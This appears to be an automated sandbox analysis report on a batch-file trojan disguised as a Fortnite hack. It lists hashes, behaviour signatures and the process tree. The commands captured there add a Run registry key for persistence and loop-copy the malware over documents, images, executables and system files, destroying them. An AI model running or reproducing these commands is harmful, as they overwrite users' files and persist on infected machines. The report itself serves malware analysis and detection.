Resubmissions

09/03/2025, 01:58

250309-cdv29swybs 10

08/03/2025, 06:55

250308-hp35xatjt9 10

08/03/2025, 04:53

250308-fh1ebssky5 10

Analysis

  • max time kernel
    300s
  • max time network
    117s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/03/2025, 01:58

General

  • Target

    My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat

  • Size

    34KB

  • MD5

    ac04b6f6fa293c4b55c4c8b49372a9ec

  • SHA1

    9dfca519218c3c10203163454f1237916b0655cc

  • SHA256

    273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92

  • SHA512

    b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086

  • SSDEEP

    192:9TIqVppLuLpDq7QYfLGMV+jasHHLgLxLR44444444444444444M666666666666Q:9rVppLuLpDq7QYfLGMV+jasHHLgLxi

Malware Config

Signatures

  • Drops file in Drivers directory 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Modifies registry class 18 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4980
    • C:\Windows\system32\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_7188_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat /f
      2⤵
      • Adds Run key to start application
      PID:1836
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y "
      2⤵
        PID:2668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_doc.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
        2⤵
          PID:4072
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
          2⤵
            PID:3380
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_lnk.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
            2⤵
              PID:3760
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
              2⤵
                PID:3688
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_pdf.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                2⤵
                  PID:2444
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                  2⤵
                    PID:116
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_txt.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                    2⤵
                    • Drops file in Drivers directory
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:1372
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                    2⤵
                      PID:1836
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp3.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                      2⤵
                        PID:3936
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                        2⤵
                          PID:2352
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                          2⤵
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          PID:3424
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                          2⤵
                            PID:4268
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_mp4.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                            2⤵
                            • Drops file in Program Files directory
                            PID:1292
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                            2⤵
                              PID:2240
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_png.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                              2⤵
                              • Drops file in System32 directory
                              • Drops file in Program Files directory
                              • Drops file in Windows directory
                              PID:2020
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                              2⤵
                                PID:5012
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                2⤵
                                • Drops file in System32 directory
                                • Drops file in Windows directory
                                PID:4668
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                2⤵
                                  PID:2340
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                  2⤵
                                  • Drops file in System32 directory
                                  • Drops file in Program Files directory
                                  • Drops file in Windows directory
                                  PID:1216
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                  2⤵
                                    PID:3576
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                    2⤵
                                    • Drops file in System32 directory
                                    • Drops file in Program Files directory
                                    • Drops file in Windows directory
                                    PID:2052
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y "
                                    2⤵
                                      PID:100
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_xml.txt) do copy /y C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\Trojan.Bat.FortniteHackz.bat "%j:%k""
                                      2⤵
                                      • Drops file in System32 directory
                                      • Drops file in Program Files directory
                                      • Drops file in Windows directory
                                      PID:2756

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Program Files\Microsoft Office\FileSystemMetadata.xml

                                    Filesize

                                    34KB

                                    MD5

                                    4a812cb3bddc8bd1d63252fb8c483b9b

                                    SHA1

                                    7afeabf10ba2994cd8a69cd6ce0d574e9c78d797

                                    SHA256

                                    7deab1b703f5b0a5276ebc7b6c6431754f48608b514af206a2d235bf873a585a

                                    SHA512

                                    8917df6652689e936a55082fe8ace70c415c482a3ece37890c54933ec351e355152ec234fcace948003455ac05c987933f8882cd0e925efb6a602160529d6cc1

                                  • C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml

                                    Filesize

                                    34KB

                                    MD5

                                    27aee8043f5ffe3f0f667e28b8879502

                                    SHA1

                                    ec106279a6f518dbad09d70721c3cdf20874975c

                                    SHA256

                                    acd484b2714e2385feb36052c6c3197933c413a902dd705dea69d22e79e94da6

                                    SHA512

                                    0cb9e46a93fb05902a8652462f159a2fce4e1a1922a1a10d054303156cbb6a55047bf39640af8f61b4f63aa42d8b68b4dc12038b2b0c864d8f5886407005a14b

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_doc.txt

                                    Filesize

                                    1KB

                                    MD5

                                    031e426c853451490b60ffeb2fd13539

                                    SHA1

                                    d11935f2872953ef19aa7f1dfbaba0c9954b205f

                                    SHA256

                                    aded8bf1652629e4d75e7baa4bb6963cb42baf5f67265a8551d22c34908416e9

                                    SHA512

                                    e832312b0360cb3eebd19bec7a8ff85666ba497b512e7baf26766c4337b1d4df825de6a69f0d44924502576b0cb4113c36ad62b9bf15545d5b56d661d63ebc19

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_exe.txt

                                    Filesize

                                    541KB

                                    MD5

                                    3dd26776185fd8fe211ed70a11cfe4b0

                                    SHA1

                                    89617456aac9747cbf679c83ac08a9977aa604ff

                                    SHA256

                                    a30d14f22e5d3e9dd80dfd8133b7d01a39131a52a9e003876b66c1d3bdf59e6b

                                    SHA512

                                    75ae6ad9a278264e8a626e7ad295decca80c2db46a33da603feddf4431fda82683ddc15fc9c71f70f5763e791e96b3f73efe4f9e445eb4ae7a283ec575b91328

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_lnk.txt

                                    Filesize

                                    41KB

                                    MD5

                                    025b071cf5ff7d1bcaf8d6a758b4b974

                                    SHA1

                                    b55c871a42df668b1f07e3d214bed009ca0c8a23

                                    SHA256

                                    495c90bbe6555aaf7506ad493b6617580cce8e775652a43a91aef8248b8ba871

                                    SHA512

                                    fca0efa69f8ffc07b6ecb3f3f64fecc727794055af27cd70b44d6409f573e653ae2a0df4ac3ba2c83e0da1be813530b12680fb24a7215dce4540520b93e248f8

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_mp3.txt

                                    Filesize

                                    160B

                                    MD5

                                    f149377191b51abb3c0514f5a8c87573

                                    SHA1

                                    9533737585b0369533681b025d654178016d4502

                                    SHA256

                                    605d1f5cf8501e16bba22d417749da9319bd7602487913a0cabea85346082b01

                                    SHA512

                                    6a71fc943b77c442cff1c4c4e8d73a1d8a5a4e2ba4442ca7ff38f1dbf115abd16548a08bcb208b92a399207343ec9c3c0a4d6407dc040ad4203de6faaacc66fd

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_mp4.txt

                                    Filesize

                                    2KB

                                    MD5

                                    199dc21ff9bc7a3174c71540f4a17cf8

                                    SHA1

                                    93d5af17642721ea491004362ca84b08aaffab3d

                                    SHA256

                                    7cc4e699bd1e12f2f60613adf4e395f72b122ce6f79155574bbc8df255ce607c

                                    SHA512

                                    363d1757410e50d1b9a555e72c16fda613bd5bbddf9f19fb37f613bf53cb8a8c0abc64a936dd102190befdb5ec3cd2a152255250961389b4d2d0b1e8bbbc03ec

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_pdf.txt

                                    Filesize

                                    2KB

                                    MD5

                                    57727573e27460e5daa9445ddd95a541

                                    SHA1

                                    d14cd5d4a9d6e27a02003ee095e4f9b3e587ed62

                                    SHA256

                                    4df68c1fba81b1cf329b4e08610be2a95279b9d9d9a70ec842cdd1ac4d61fc72

                                    SHA512

                                    38d5cd7b4f818f04a7b93adf5aac17582fd356b2541e2fea8b41180aae82c082025e8b3a22b5225dc55aa07f529e6e8e8b4d1bfc8d61aef4d89ab56fb9ab08fa

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_png.txt

                                    Filesize

                                    1.7MB

                                    MD5

                                    82eb38622551dbe5027277caba1886d3

                                    SHA1

                                    e3858d1f6d0858ecb87a6db3233051db1143eee7

                                    SHA256

                                    7a368f27fd8555b81c08f1f5c2c9455bc4492cd680451fd9b7e4068cb19f9333

                                    SHA512

                                    80d7c1b0d44287ed6ea5847fad0d13b64d57bc550168a1ab3b9aae29f0a423d69059bc802283dfe37efd6759d45aca9bcd66cbfe5c24e329227555bd546bee4e

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_txt.txt

                                    Filesize

                                    43KB

                                    MD5

                                    e311dc2921ff2679e7a536347824d01a

                                    SHA1

                                    ee55fb3719de270875485e0c51e1207fd86e5676

                                    SHA256

                                    e6ae9adaba9bf85c2b95589f37547dfd8b13ceba4c0f05ca5c6c1c7edbc5b8f1

                                    SHA512

                                    9f7c66ac5d43bda54a2d6a6bcfe1e77f9ce0821235ba1257de4c4c2f9d5c17b82708094190e5a97a3972512c49f78e148141a49330c84d004df699f46bdef8d7

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

                                    Filesize

                                    349KB

                                    MD5

                                    8bbe092c147ea3c9cf1af49b4adc316e

                                    SHA1

                                    44a3d232670ef1a52f1bcc9ba1581bb039f58ac6

                                    SHA256

                                    ec5353fc9c0f3107230fe9d21f5841f34670e621c3f58e7f617cec340f1f04d7

                                    SHA512

                                    29f93bd3c0a8c8ca2fd930d8b3a28fbcbcbcb1abb4ea437b0b38d035167625260ca6ae70a197f8dd3bd129eb1baeb5361865ce83e37dd8ef9a54fb9f3a482374

                                  • C:\Users\Admin\AppData\Local\Temp\My-Skidded-malwares-main\InfList_xml.txt

                                    Filesize

                                    698KB

                                    MD5

                                    95943332ae7c3b0e945b87612a3b8d64

                                    SHA1

                                    9501259e29412d069223c89c4a8d9816b40faa8b

                                    SHA256

                                    0d7e9c66ba0d97fc23dad44913a0034a98af1e08d966ab205ce913be158d5b1f

                                    SHA512

                                    a7241dd3559402ee48840d5f032688c0fc73a2d2ad13c1146f0f51c8351910f77ccb9bf229262e342a11955ace5af9f6c0932cf03b8b6a22610ad1e6fcabd656

                                  • C:\Users\Admin\Desktop\RepairPush.docx

                                    Filesize

                                    34KB

                                    MD5

                                    ac04b6f6fa293c4b55c4c8b49372a9ec

                                    SHA1

                                    9dfca519218c3c10203163454f1237916b0655cc

                                    SHA256

                                    273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92

                                    SHA512

                                    b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086